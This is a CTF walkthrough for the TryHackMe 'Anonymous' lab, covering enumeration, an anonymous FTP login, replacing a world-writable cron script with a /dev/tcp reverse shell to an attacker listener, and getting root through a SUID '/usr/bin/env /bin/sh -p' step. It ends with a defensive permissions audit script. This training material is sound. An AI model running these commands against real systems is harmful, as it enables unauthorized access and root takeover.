THM Anonymous Walkthrough

TryHackMe Anonymous

TryHackMe is a popular service that offers walkthrough and CTF rooms in order to give people interested in infosec a playground to improve their current skills and obtain new knowledge and tricks. The TryHackMe Anonymous room is a very beginner-friendly CTF that is based on a poorly configured Samba share and FTP server, and on escalating privileges up to root by using the SUID bit, which lets a normal user run a certain program with the privileges of the file's owner (here root) without entering a password or being in the sudoers list.

Before reading this THM Anonymous walkthrough you should have a basic understanding of FTP and Linux permissions.

Information Gathering

First, let's start with gathering some information using nmap:

sudo nmap -p 1-5000 -sV -O -v 10.10.62.117

Four services are running:

The running operating system seems to be Linux.

Now use smbmap to enumerate possible SMB shares: smbmap -H 10.10.62.117

[+] Guest session   	IP: 10.10.62.117:445	Name: 10.10.62.117
        Disk                                              	Permissions	Comment
	----                                              	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	pics                                              	READ ONLY	My SMB Share Directory for Pics
	IPC$                                              	NO ACCESS	IPC Service (anonymous server (Samba, Ubuntu))

So, there are three shares and one seems to be accessible with a guest account.


Enumerate Samba and FTP

Using smbclient we can take a look at the public share called "pics":

smbclient \\\\10.10.62.117\\pics

Inside the share there is a jpg and a jpeg file. We are also not able to change our current working directory, so let's download both image files to our local machine and investigate them. (To download a file use the get command.)

At this point you can already answer the first four questions for the THM Anonymous room.

Next, let's try to log into the running FTP service using ftp 10.10.62.117 21. Use Anonymous as the username and leave the password blank. Luckily, anonymous login is enabled on the server:

┌─[user@parrot-virtual]─[~/Desktop]
└──╼ $ftp 10.10.62.117 21
Connected to 10.10.62.117.
220 NamelessOne's FTP Server!
Name (10.10.62.117:user): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

In our cwd is a directory called scripts with the permission bits 777. Inside that directory are three files:

The Samba share is actually not needed for the rest of this THM Anonymous walkthrough, so feel free to forget about it.


Obtaining a reverse shell & the user flag

The log file and the todo file are not really interesting or useful, but the bash script might be useful for getting access to the server.

The permission bits for clean.sh are 757 (rwxr-xrwx), which means the owner and everyone else can read and execute the file, and "other", which includes the anonymous FTP user, is also allowed to write to it.

#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

The script itself doesn't have any real functionality because tmp_files will always be 0 (and the test [ $tmp_files=0 ] is a single non-empty string, so it is always true). Since the log file shows that it is executed periodically, let's give the script a real functionality:

#!/bin/bash

bash -i >& /dev/tcp/10.9.157.58/4545 0>&1

This should spawn a reverse shell from the THM Anonymous machine back to our listener.

Start a netcat listener and upload the script to the server with put clean.sh. After some time, when the script is executed again, a shell should spawn.

Now you are able to read the user flag.


Rooting TryHackMe Anonymous

I checked for any interesting permission bits with: find / -perm -u=s -type f 2>/dev/null

First, I tried abusing pkexec with no success and then moved on to /usr/bin/env.

Running /usr/bin/env /bin/sh alone does not escalate our current privileges, but adding -p keeps the elevated effective UID instead of dropping it, so the shell runs with the SUID privileges: /usr/bin/env /bin/sh -p.

Now we have escalated our privileges to root and are able to navigate to root's home directory in order to read the other flag.
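The two misconfigurations this room chains together, a world-writable script in the FTP root and a SUID binary that hands out a root shell, are both things a quick permission audit catches. The following POSIX shell audit is an added example for this walkthrough, not code from the room or its author; the function names and the directory it is pointed at (e.g. /var/ftp) are assumptions.

```shell
#!/bin/sh
# Added audit example (not part of the room or the original write-up).
# It checks a directory tree for the two conditions this room relies on:
#   1. entries writable by "other" (the 777 scripts directory and the
#      757 clean.sh that anonymous FTP users can overwrite), and
#   2. regular files with the SUID bit set (the root step abuses /usr/bin/env).
# Assumption: the tree to audit is passed as $1, e.g.  audit_tree /var/ftp

# List files and directories under $1 that anyone on the system can write to.
# -perm -0002 matches any mode with the other-write bit set, so 757 and 777 hit.
world_writable() {
    find "$1" -perm -0002 \( -type f -o -type d \) 2>/dev/null | sort
}

# List regular files under $1 with the setuid bit (mode 4000) set.
suid_files() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# Print findings and return 1 if there are any, 0 if the tree is clean.
audit_tree() {
    rc=0
    ww=$(world_writable "$1")
    if [ -n "$ww" ]; then
        printf 'WORLD-WRITABLE (anyone can replace these):\n%s\n' "$ww"
        rc=1
    fi
    su=$(suid_files "$1")
    if [ -n "$su" ]; then
        printf 'SUID (executes as the file owner):\n%s\n' "$su"
        rc=1
    fi
    return $rc
}
```

Run it against the FTP root on a schedule and alert on a non-zero exit; the 757 clean.sh and the 777 scripts directory from this room would both show up in the first section.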


Tags:

THM, TryHackMe, Anonymous